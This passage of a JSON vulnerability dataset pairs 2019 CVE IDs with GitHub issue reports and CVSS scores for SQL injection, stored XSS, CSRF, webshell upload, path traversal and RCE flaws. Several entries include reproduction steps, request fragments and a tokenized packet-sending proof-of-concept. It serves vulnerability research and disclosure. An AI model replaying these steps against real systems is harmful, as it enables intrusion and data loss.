  44616. "exploitabilityScore": 2.8
  44617. },
  44618. {
  44619. "CVE_ID": "CVE-2019-8381",
  44620. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/538",
  44621. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/538",
  44622. "Repo_new": "appneta/tcpreplay",
  44623. "Issue_Created_At": "2019-02-12T17:10:10Z",
  44624. "description": "Invalid memory access in APITAG . Description we observed that there is an Invalid memory access at APITAG in APITAG APITAG same be triggered by sending a crafted pcap file to the tcpreplay edit binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command tcpreplay edit r NUMBERTAG s NUMBERTAG b C m NUMBERTAG P oneatatime i $INTERFACE $POC POC REPRODUCER URLTAG Debug GDB ERRORTAG",
  44625. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44626. "severity": "HIGH",
  44627. "baseScore": 7.8,
  44628. "impactScore": 5.9,
  44629. "exploitabilityScore": 1.8
  44630. },
  44631. {
  44632. "CVE_ID": "CVE-2019-8393",
  44633. "Issue_Url_old": "https://github.com/FantasticLBP/Hotels_Server/issues/4",
  44634. "Issue_Url_new": "https://github.com/fantasticlbp/hotels_server/issues/4",
  44635. "Repo_new": "fantasticlbp/hotels_server",
  44636. "Issue_Created_At": "2019-02-17T05:50:57Z",
  44637. "description": "APITAG through NUMBERTAG has SQL Injection via the API.. In PATHTAG It will receive a parameter called \"telephone\" to search for existed users. But in fact,this parameter just become a part of the SQL request without any process,so it will be possible to have a SQL injection. We can use SQLMAP to test this vulnerability: FILETAG FILETAG FILETAG",
  44638. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44639. "severity": "CRITICAL",
  44640. "baseScore": 9.8,
  44641. "impactScore": 5.9,
  44642. "exploitabilityScore": 3.9
  44643. },
  44644. {
  44645. "CVE_ID": "CVE-2019-8408",
  44646. "Issue_Url_old": "https://github.com/Self-Evident/OneFileCMS/issues/51",
  44647. "Issue_Url_new": "https://github.com/self-evident/onefilecms/issues/51",
  44648. "Repo_new": "self-evident/onefilecms",
  44649. "Issue_Created_At": "2019-01-29T06:16:32Z",
  44650. "description": "onefilecms.php in APITAG can be illegally modified. APITAG FILETAG by username/password , then click APITAG master'. FILETAG APITAG click APITAG FILETAG APITAG can see that there is no permission to edit APITAG And then click 'copy'. FILETAG APITAG to do ,and click 'copy' again. FILETAG APITAG you can see ,the file is ready for editing and saving. As following picture shows. FILETAG",
  44651. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  44652. "severity": "MEDIUM",
  44653. "baseScore": 4.9,
  44654. "impactScore": 3.6,
  44655. "exploitabilityScore": 1.2
  44656. },
  44657. {
  44658. "CVE_ID": "CVE-2019-8411",
  44659. "Issue_Url_old": "https://github.com/615/VulnPoC/issues/1",
  44660. "Issue_Url_new": "https://github.com/615/vulnpoc/issues/1",
  44661. "Repo_new": "615/vulnpoc",
  44662. "Issue_Created_At": "2019-01-09T09:41:42Z",
  44663. "description": "zzcms NUMBERTAG data NUMBERTAG link: FILETAG FILETAG Edition: zzcms NUMBERTAG data NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG There is unlink($fp) to delete any file by controlloing the value of $_GET FILETAG so we can delete APITAG",
  44664. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  44665. "severity": "HIGH",
  44666. "baseScore": 7.5,
  44667. "impactScore": 3.6,
  44668. "exploitabilityScore": 3.9
  44669. },
  44670. {
  44671. "CVE_ID": "CVE-2019-8419",
  44672. "Issue_Url_old": "https://github.com/tamlok/vnote/issues/564",
  44673. "Issue_Url_new": "https://github.com/vnotex/vnote/issues/564",
  44674. "Repo_new": "vnotex/vnote",
  44675. "Issue_Created_At": "2019-01-05T08:37:36Z",
  44676. "description": "We found a stored xss vulnerability in vnote. Hello friend\uff0cwe are farmsec security team\uff0cwe found a stored xss vulnerability in vnote\uff1a OS Version : Linux APITAG Version APITAG NUMBERTAG Symptoms : APITAG app does not filter specific html tags\uff0cas\uff1a APITAG APITAG APITAG NUMBERTAG An attacker can execute a javascript script by using a malicious html tag. FILETAG How to Repro : APITAG vnote for linux URLTAG FILETAG APITAG New Note Fill in the notebook name FILETAG Click OK. APITAG folder FILETAG Click OK. APITAG text note FILETAG APITAG in the xss vulnerability test payload payload: APITAG APITAG note Enter Ctrl+T FILETAG The code is executed in the browser",
  44677. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44678. "severity": "MEDIUM",
  44679. "baseScore": 6.1,
  44680. "impactScore": 2.7,
  44681. "exploitabilityScore": 2.8
  44682. },
  44683. {
  44684. "CVE_ID": "CVE-2019-8421",
  44685. "Issue_Url_old": "https://github.com/bagesoft/bagecms/issues/5",
  44686. "Issue_Url_new": "https://github.com/bagesoft/bagecms/issues/5",
  44687. "Repo_new": "bagesoft/bagecms",
  44688. "Issue_Created_At": "2019-02-13T12:50:34Z",
  44689. "description": "SQL injection vulnerability can inject user data. URL\uff1a FILETAG There are two parameters in the file that may be injected. Controller at PATHTAG FILETAG FILETAG FILETAG There is no parameter filtering here, and these parameters are brought into the database for query, then there may be a SQL injection vulnerability here. Find the location of the vulnerability url\uff1a URLTAG FILETAG Impact parameters: Title How to affect the parameter title, click on the query, and view the request package through the burst suite. Vulnerability POC Request Package: GET APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,zh CN; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG DNT NUMBERTAG Recurring steps NUMBERTAG First enter the website background management page NUMBERTAG Go to the content, content management page. FILETAG There is a query button at the top right to query NUMBERTAG burp suite capture packet analysis. FILETAG Inject test on the tittlealias Use sqlmap to verify that there is an injection point. FILETAG",
  44690. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  44691. "severity": "HIGH",
  44692. "baseScore": 7.2,
  44693. "impactScore": 5.9,
  44694. "exploitabilityScore": 1.2
  44695. },
  44696. {
  44697. "CVE_ID": "CVE-2019-8433",
  44698. "Issue_Url_old": "https://github.com/jetiben/jtbc/issues/6",
  44699. "Issue_Url_new": "https://github.com/jetiben/jtbc/issues/6",
  44700. "Repo_new": "jetiben/jtbc",
  44701. "Issue_Created_At": "2019-01-07T08:16:42Z",
  44702. "description": "Bug: file upload Vulnerability. There is an file upload vulnerability in your latest version of the CMS NUMBERTAG In URLTAG \uff0cupload the file FILETAG document content \uff1a FILETAG FILETAG APITAG To Reproduce: Open below URL in browser which supports flash. url: URLTAG upload FILETAG exp: FILETAG APITAG Fi NUMBERTAG erify the file name suffix and limit the uploading (php, jsp, aspx) scripts NUMBERTAG Set the upload whitelist, only allow uploading whitelist (jpg, png, gif) and other file types NUMBERTAG Set file storage directory permissions, prohibit file upload directory for script parsing.",
  44703. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  44704. "severity": "HIGH",
  44705. "baseScore": 7.5,
  44706. "impactScore": 3.6,
  44707. "exploitabilityScore": 3.9
  44708. },
  44709. {
  44710. "CVE_ID": "CVE-2019-8435",
  44711. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/3",
  44712. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/3",
  44713. "Repo_new": "gaozhifeng/phpmywind",
  44714. "Issue_Created_At": "2019-01-09T05:50:37Z",
  44715. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an xss vulnerability in your latest version of the NUMBERTAG In the PATHTAG FILETAG APITAG To Reproduce: FILETAG FILETAG Fi NUMBERTAG Strictly verify user input, you must perform strict checks and html escape escaping on all input scripts, iframes, etc. The input here is not only the input interface that the user can directly interact with, but also the variables in the HTTP request in the HTTP request, the variables in the HTTP request header, and so on NUMBERTAG erify the data type and verify its format, length, scope, and content NUMBERTAG Not only need to be verified on the client side but also on the server side NUMBERTAG The output data should also be checked. The values in the database may be output in multiple places on a large website. Even if the input is coded, the security check should be performed at the output points.",
  44716. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  44717. "severity": "MEDIUM",
  44718. "baseScore": 4.8,
  44719. "impactScore": 2.7,
  44720. "exploitabilityScore": 1.7
  44721. },
  44722. {
  44723. "CVE_ID": "CVE-2019-8437",
  44724. "Issue_Url_old": "https://github.com/beyond7176/njiandan-cms/issues/1",
  44725. "Issue_Url_new": "https://github.com/beyond7176/njiandan-cms/issues/1",
  44726. "Repo_new": "beyond7176/njiandan-cms",
  44727. "Issue_Created_At": "2019-01-09T10:01:18Z",
  44728. "description": "BUG: CSRF vulnerability. There is an CSRF vulnerability in your CMS Log in as an admin Inducing the admin to click on the link success add an administrator. POC CODETAG FILETAG APITAG FI NUMBERTAG erify the HTTP Referer field NUMBERTAG Add a token to the request address and verify (the token is not placed in the cookie, placed in the http request parameter, and the server verifies it NUMBERTAG Add the token to the http header attribute to prevent the token from appearing in the browser and being leaked.",
  44729. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44730. "severity": "HIGH",
  44731. "baseScore": 8.8,
  44732. "impactScore": 5.9,
  44733. "exploitabilityScore": 2.8
  44734. },
  44735. {
  44736. "CVE_ID": "CVE-2019-8438",
  44737. "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/61",
  44738. "Issue_Url_new": "https://github.com/chekun/dilicms/issues/61",
  44739. "Repo_new": "chekun/dilicms",
  44740. "Issue_Created_At": "2019-01-10T02:43:25Z",
  44741. "description": "Stored XSS Vulnerability Found in System setting > site setting > APITAG APITAG the backstage FILETAG NUMBERTAG Go to System setting >site setting FILETAG NUMBERTAG add the following payload to the first textbox\uff0cand submit\u3002 APITAG APITAG APITAG alert NUMBERTAG APITAG FILETAG And then Stored XSS triggered",
  44742. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  44743. "severity": "MEDIUM",
  44744. "baseScore": 4.8,
  44745. "impactScore": 2.7,
  44746. "exploitabilityScore": 1.7
  44747. },
  44748. {
  44749. "CVE_ID": "CVE-2019-8439",
  44750. "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/62",
  44751. "Issue_Url_new": "https://github.com/chekun/dilicms/issues/62",
  44752. "Repo_new": "chekun/dilicms",
  44753. "Issue_Created_At": "2019-01-10T03:09:01Z",
  44754. "description": "Stored XSS Vulnerability Found in System setting > site setting > APITAG APITAG the backstage FILETAG NUMBERTAG Go to System setting >site setting FILETAG NUMBERTAG add the following payload to the second textbox\uff0cand submit\u3002 payload\uff1asite_domain= FILETAG \" onmouseover=\"alert NUMBERTAG FILETAG And move your mouse on the second textbook \uff0cthen Stored XSS triggered",
  44755. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  44756. "severity": "MEDIUM",
  44757. "baseScore": 5.4,
  44758. "impactScore": 2.7,
  44759. "exploitabilityScore": 2.3
  44760. },
  44761. {
  44762. "CVE_ID": "CVE-2019-8440",
  44763. "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/63",
  44764. "Issue_Url_new": "https://github.com/chekun/dilicms/issues/63",
  44765. "Repo_new": "chekun/dilicms",
  44766. "Issue_Created_At": "2019-01-10T03:16:54Z",
  44767. "description": "Stored XSS Vulnerability Found in System setting > site setting > APITAG APITAG the backstage FILETAG NUMBERTAG Go to System setting >site setting FILETAG NUMBERTAG add the following payload to the third textbox\uff0cand submit\u3002 APITAG onmouseover=\"alert NUMBERTAG FILETAG And move your mouse on the third textbook \uff0cthen Stored XSS triggered",
  44768. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  44769. "severity": "MEDIUM",
  44770. "baseScore": 4.8,
  44771. "impactScore": 2.7,
  44772. "exploitabilityScore": 1.7
  44773. },
  44774. {
  44775. "CVE_ID": "CVE-2019-8902",
  44776. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/56",
  44777. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/56",
  44778. "Repo_new": "idreamsoft/iCMS",
  44779. "Issue_Created_At": "2019-02-18T11:14:06Z",
  44780. "description": "A CSRF vulnerability exists in iCMS NUMBERTAG When the users login in, he can add an link URL in the article. Then the other users open the link URL will cause CSRF. POC NUMBERTAG html delete users' articles ERRORTAG",
  44781. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
  44782. "severity": "MEDIUM",
  44783. "baseScore": 5.7,
  44784. "impactScore": 3.6,
  44785. "exploitabilityScore": 2.1
  44786. },
  44787. {
  44788. "CVE_ID": "CVE-2019-8908",
  44789. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/3",
  44790. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/3",
  44791. "Repo_new": "taosir/wtcms",
  44792. "Issue_Created_At": "2019-02-18T07:33:00Z",
  44793. "description": "An issue was discovered in APITAG there is an Backstage editor getshell Vulnerability. The attacker opens Setting Mailbox configuration Registration email template,upload the image through the editor, burbsuite capture the package and change the Suffix, you can upload any file. FILETAG FILETAG FILETAG FILETAG",
  44794. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44795. "severity": "CRITICAL",
  44796. "baseScore": 9.8,
  44797. "impactScore": 5.9,
  44798. "exploitabilityScore": 3.9
  44799. },
  44800. {
  44801. "CVE_ID": "CVE-2019-8909",
  44802. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/6",
  44803. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/6",
  44804. "Repo_new": "taosir/wtcms",
  44805. "Issue_Created_At": "2019-02-18T11:01:34Z",
  44806. "description": "The background verification code size can be controlled to cause a denial of service attack.. APITAG click to view the verification code image address APITAG width and height in the url APITAG burpsuite to fetch data and see the size of the returned package APITAG modifying the length and width values and seeing the size of the returned package APITAG the above test, we know that the vulnerability exists. If we send a NUMBERTAG packet to the server and the server takes NUMBERTAG s to process, then if we send NUMBERTAG packets NUMBERTAG s That is, the server takes NUMBERTAG s to process. When we send NUMBERTAG such packets (of course, you should never throw them with NUMBERTAG packets. Generally speaking NUMBERTAG test results can lead to website crashes.) FILETAG FILETAG FILETAG FILETAG",
  44807. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44808. "severity": "HIGH",
  44809. "baseScore": 7.5,
  44810. "impactScore": 3.6,
  44811. "exploitabilityScore": 3.9
  44812. },
  44813. {
  44814. "CVE_ID": "CVE-2019-8910",
  44815. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/5",
  44816. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/5",
  44817. "Repo_new": "taosir/wtcms",
  44818. "Issue_Created_At": "2019-02-18T10:29:15Z",
  44819. "description": "Csrf + Xss combination Can be obtained administrator cookie. Place of backstage set up website information exists Csrf Vulnerability,attacker Structure a csrf APITAG the administrator clicks on the malicious link, the site information is automatically changed. There is still an xss in the place of the website statistics code. FILETAG We can write an xss first, and then construct the csrf code, so that after the webmaster clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the administrator visits the homepage of the website, he can get him Cookie CSRF Exp: CODETAG FILETAG",
  44820. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44821. "severity": "HIGH",
  44822. "baseScore": 8.8,
  44823. "impactScore": 5.9,
  44824. "exploitabilityScore": 2.8
  44825. },
  44826. {
  44827. "CVE_ID": "CVE-2019-8919",
  44828. "Issue_Url_old": "https://github.com/haiwen/seadroid/issues/789",
  44829. "Issue_Url_new": "https://github.com/haiwen/seadroid/issues/789",
  44830. "Repo_new": "haiwen/seadroid",
  44831. "Issue_Created_At": "2019-02-18T13:09:10Z",
  44832. "description": "IV should be randomness and unpredictable. When using client side encryption, for one encrypted library, the IV is stored and the client program always uses this one IV to encrypt and decrypt different files. IV reused is unsafe and should not be used, the IV should be randomness and unpredictable. ( CVETAG : CVETAG These are Debug details for three different files when decrypting them in the client APITAG side: File1: Cipher MENTIONTAG APITAG File2: Cipher MENTIONTAG APITAG File3: Cipher MENTIONTAG APITAG",
  44833. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  44834. "severity": "HIGH",
  44835. "baseScore": 7.5,
  44836. "impactScore": 3.6,
  44837. "exploitabilityScore": 3.9
  44838. },
  44839. {
  44840. "CVE_ID": "CVE-2019-8939",
  44841. "Issue_Url_old": "https://github.com/Tautulli/Tautulli-Issues/issues/161",
  44842. "Issue_Url_new": "https://github.com/tautulli/tautulli-issues/issues/161",
  44843. "Repo_new": "tautulli/tautulli-issues",
  44844. "Issue_Created_At": "2019-02-19T15:15:29Z",
  44845. "description": "Insufficient username filtering in FILETAG allows XSS and data exfiltration. Version NUMBERTAG What you did? I changed my Plex username to APITAG . What happened? Tautulli does filter APITAG and when someone visits the History page, it's executed in the context of whichever user is logged in, probably the server admin. Lines NUMBERTAG are vulnerable: URLTAG Here we can see how it is reflected: CODETAG What you expected? I didn't expect my friend's Plex server to leak a bunch of information at me. How can we reproduce your issue? Setup a Plex Media Server, Install Tautulli, create a normal Plex user account to consume media. Change the user account name to something with APITAG Visit the Tautulli History page.",
  44846. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44847. "severity": "MEDIUM",
  44848. "baseScore": 6.1,
  44849. "impactScore": 2.7,
  44850. "exploitabilityScore": 2.8
  44851. },
  44852. {
  44853. "CVE_ID": "CVE-2019-8944",
  44854. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5315",
  44855. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5315",
  44856. "Repo_new": "octopusdeploy/issues",
  44857. "Issue_Created_At": "2019-02-19T23:08:37Z",
  44858. "description": "Save terraform sensitive values as Octopus sensitive values. Sensitive Terraform output variables are saved and exposed as regular variables, and printed in the logs. For example, if you deploy the following Terraform template: APITAG The value hi would appear in the logs.",
  44859. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  44860. "severity": "MEDIUM",
  44861. "baseScore": 6.5,
  44862. "impactScore": 3.6,
  44863. "exploitabilityScore": 2.8
  44864. },
  44865. {
  44866. "CVE_ID": "CVE-2019-8944",
  44867. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5314",
  44868. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5314",
  44869. "Repo_new": "octopusdeploy/issues",
  44870. "Issue_Created_At": "2019-02-19T23:00:07Z",
  44871. "description": "Save terraform sensitive values as Octopus sensitive values. Sensitive Terraform output variables are saved and exposed as regular variables, and printed in the logs. For example, if you deploy the following Terraform template: APITAG The value hi would appear in the logs.",
  44872. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  44873. "severity": "MEDIUM",
  44874. "baseScore": 6.5,
  44875. "impactScore": 3.6,
  44876. "exploitabilityScore": 2.8
  44877. },
  44878. {
  44879. "CVE_ID": "CVE-2019-9002",
  44880. "Issue_Url_old": "https://github.com/mikelbring/tinyissue/issues/237",
  44881. "Issue_Url_new": "https://github.com/mikelbring/tinyissue/issues/237",
  44882. "Repo_new": "mikelbring/tinyissue",
  44883. "Issue_Created_At": "2019-02-20T01:56:44Z",
  44884. "description": "There is a security problem that can getshell. problem file at FILETAG line NUMBERTAG config_file = str_replace('localhost', $_POST FILETAG",
  44885. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44886. "severity": "CRITICAL",
  44887. "baseScore": 9.8,
  44888. "impactScore": 5.9,
  44889. "exploitabilityScore": 3.9
  44890. },
  44891. {
  44892. "CVE_ID": "CVE-2019-9004",
  44893. "Issue_Url_old": "https://github.com/eclipse/wakaama/issues/425",
  44894. "Issue_Url_new": "https://github.com/eclipse/wakaama/issues/425",
  44895. "Repo_new": "eclipse/wakaama",
  44896. "Issue_Created_At": "2019-02-18T16:50:03Z",
  44897. "description": "Memory leak while processing crafted packet. Wakaama LWM2M server incorrectly handles incoming packets leading to a memory leak. Processing of the single crafted packet leads to leaking (wasting NUMBERTAG bytes of memory. This can lead to stopping of the LWM2M server after exhausting all available memory. Depending on server configuration and isolation of services, this can stop also other processes on the same server. Proposed CVSS NUMBERTAG Score: On systems with modern memory protection and isolation of services NUMBERTAG medium) PATHTAG On systems with lower memory protection and no isolation of services NUMBERTAG high) PATHTAG Reproduction NUMBERTAG Wakaama must be compiled with Leak Sanitizer (or other similar tool) by setting compilation flag: C_FLAGS = fsanitize=address NUMBERTAG Run Wakaama server as: lwm2mserver NUMBERTAG l NUMBERTAG Run following Python2 script (running multiple times will show larger leak): import sys import socket WAKAAMA_PAYLOAD NUMBERTAG e6e2e2e NUMBERTAG b NUMBERTAG out_data = APITAG s = APITAG APITAG ) s.sendto(out_data, APITAG APITAG Execution of the script: python2 wakaama_test.py dst_ip dst_port (where: dst_ip and dst_port are IP and port of tested Wakaama server) e.g.: sudo python wakaama_test.py APITAG NUMBERTAG Close the lwm2mserver to get report from Leak Sanitizer NUMBERTAG bytes received from NUMBERTAG E6 E2 E2 E NUMBERTAG B NUMBERTAG D......g.rd. ^C APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4fa NUMBERTAG b NUMBERTAG in malloc ( PATHTAG NUMBERTAG f1df in lwm2m_malloc ( PATHTAG NUMBERTAG ad6 in coap_add_multi_option ( PATHTAG NUMBERTAG f in coap_parse_message ( PATHTAG NUMBERTAG aac in lwm2m_handle_packet ( PATHTAG NUMBERTAG e2 in main ( PATHTAG NUMBERTAG f4fa NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
  44898. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44899. "severity": "HIGH",
  44900. "baseScore": 7.5,
  44901. "impactScore": 3.6,
  44902. "exploitabilityScore": 3.9
  44903. },
  44904. {
  44905. "CVE_ID": "CVE-2019-9015",
  44906. "Issue_Url_old": "https://github.com/yangsuda/mopcms/issues/1",
  44907. "Issue_Url_new": "https://github.com/yangsuda/mopcms/issues/1",
  44908. "Repo_new": "yangsuda/mopcms",
  44909. "Issue_Created_At": "2019-02-22T05:58:38Z",
  44910. "description": "There is a Path Traversal vulnerability that can delete unexpected critical files. Vulnerability description A Path Traversal vulnerability was discovered in mopcms which is able to delete unexpected critical files. The exploit point is in the \"column management\" function. The path added to the column is not verified. When the column is deleted by attacker, the corresponding directory is deleted. POC Firstly, create a column and edit the path as './' FILETAG And delete the column FILETAG Result FILETAG",
  44911. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  44912. "severity": "CRITICAL",
  44913. "baseScore": 9.1,
  44914. "impactScore": 5.2,
  44915. "exploitabilityScore": 3.9
  44916. },
  44917. {
  44918. "CVE_ID": "CVE-2019-9016",
  44919. "Issue_Url_old": "https://github.com/yangsuda/mopcms/issues/2",
  44920. "Issue_Url_new": "https://github.com/yangsuda/mopcms/issues/2",
  44921. "Repo_new": "yangsuda/mopcms",
  44922. "Issue_Created_At": "2019-02-22T06:35:29Z",
  44923. "description": "There is a stored XSS vulnerability. Vulnerability description A xss vulnerability was discovered in mopcms. There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form FILETAG FILETAG FILETAG",
  44924. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44925. "severity": "MEDIUM",
  44926. "baseScore": 6.1,
  44927. "impactScore": 2.7,
  44928. "exploitabilityScore": 2.8
  44929. },
  44930. {
  44931. "CVE_ID": "CVE-2019-9026",
  44932. "Issue_Url_old": "https://github.com/tbeu/matio/issues/103",
  44933. "Issue_Url_new": "https://github.com/tbeu/matio/issues/103",
  44934. "Repo_new": "tbeu/matio",
  44935. "Issue_Created_At": "2019-02-20T02:24:30Z",
  44936. "description": "some memory corruption problems when the library parse the mat file.. I found several memory corruption problem in the library. More details can be found at here URLTAG .",
  44937. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44938. "severity": "HIGH",
  44939. "baseScore": 7.5,
  44940. "impactScore": 3.6,
  44941. "exploitabilityScore": 3.9
  44942. },
  44943. {
  44944. "CVE_ID": "CVE-2019-9048",
  44945. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/69",
  44946. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/69",
  44947. "Repo_new": "pluck-cms/pluck",
  44948. "Issue_Created_At": "2019-02-18T07:08:41Z",
  44949. "description": "Four CSRF vulnerabilities in pluck cms NUMBERTAG One: use CSRF vulnerability to delete pictures Vulnerability details: When the administrator logs in, opening the webpage will automatically delete the specified image. Vulnerability url: URLTAG Vulnerability POC: APITAG Two: use the CSRF vulnerability to delete the topic Vulnerability details: When the administrator logs in, opening the web page will automatically delete the specified topic. Vulnerability url: URLTAG Vulnerability POC: APITAG Three: use CSRF vulnerability to remove the module Vulnerability details: When the administrator logs in, open the webpage and the specified module will be deleted automatically. Vulnerability url: URLTAG Vulnerability POC: APITAG Four: use CSRF vulnerability to delete pictures Vulnerability details: When the administrator logs in, opening the web page will automatically delete the specified article. Vulnerability url: URLTAG Vulnerability POC: APITAG Vulnerability suggestions: One: Detect user submissions by referer, token, or verification code. Second: It is best to use the post operation for users to modify and delete.",
  44950. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  44951. "severity": "MEDIUM",
  44952. "baseScore": 6.5,
  44953. "impactScore": 3.6,
  44954. "exploitabilityScore": 2.8
  44955. },
  44956. {
  44957. "CVE_ID": "CVE-2019-9050",
  44958. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/70",
  44959. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/70",
  44960. "Repo_new": "pluck-cms/pluck",
  44961. "Issue_Created_At": "2019-02-18T07:28:57Z",
  44962. "description": "A file upload vulnerability. Vulnerability details: In the management module page, the installation module uploads a compressed webshell, which can be directly uploaded and decompressed, causing the entire website to crash. Vulnerability url: URLTAG Vulnerability POC: POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"sendfile\"; APITAG Content Type: application/x zip compressed",
  44963. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  44964. "severity": "HIGH",
  44965. "baseScore": 7.2,
  44966. "impactScore": 5.9,
  44967. "exploitabilityScore": 1.2
  44968. },
  44969. {
  44970. "CVE_ID": "CVE-2019-9082",
  44971. "Issue_Url_old": "https://github.com/xiayulei/open_source_bms/issues/33",
  44972. "Issue_Url_new": "https://github.com/suitablecodes/open_source_bms/issues/33",
  44973. "Repo_new": "suitablecodes/open_source_bms",
  44974. "Issue_Created_At": "2019-01-12T03:43:00Z",
  44975. "description": "There is A RCE vulnerability in your system.. The APITAG Command Execution) vulnerability is triggered by a http APITAG executed the command \"whoami\". poc: URLTAG FILETAG FILETAG",
  44976. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44977. "severity": "HIGH",
  44978. "baseScore": 8.8,
  44979. "impactScore": 5.9,
  44980. "exploitabilityScore": 2.8
  44981. },
  44982. {
  44983. "CVE_ID": "CVE-2019-9107",
  44984. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/169",
  44985. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/169",
  44986. "Repo_new": "wuzhicms/wuzhicms",
  44987. "Issue_Created_At": "2019-02-14T02:24:30Z",
  44988. "description": "wuzhicms NUMBERTAG imgurl reflected xss vulnerability. A xss vulnerability was discovered in WUZHI CMS NUMBERTAG",
  44989. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44990. "severity": "MEDIUM",
  44991. "baseScore": 6.1,
  44992. "impactScore": 2.7,
  44993. "exploitabilityScore": 2.8
  44994. },
  44995. {
  44996. "CVE_ID": "CVE-2019-9108",
  44997. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/171",
  44998. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/171",
  44999. "Repo_new": "wuzhicms/wuzhicms",
  45000. "Issue_Created_At": "2019-02-14T03:12:32Z",
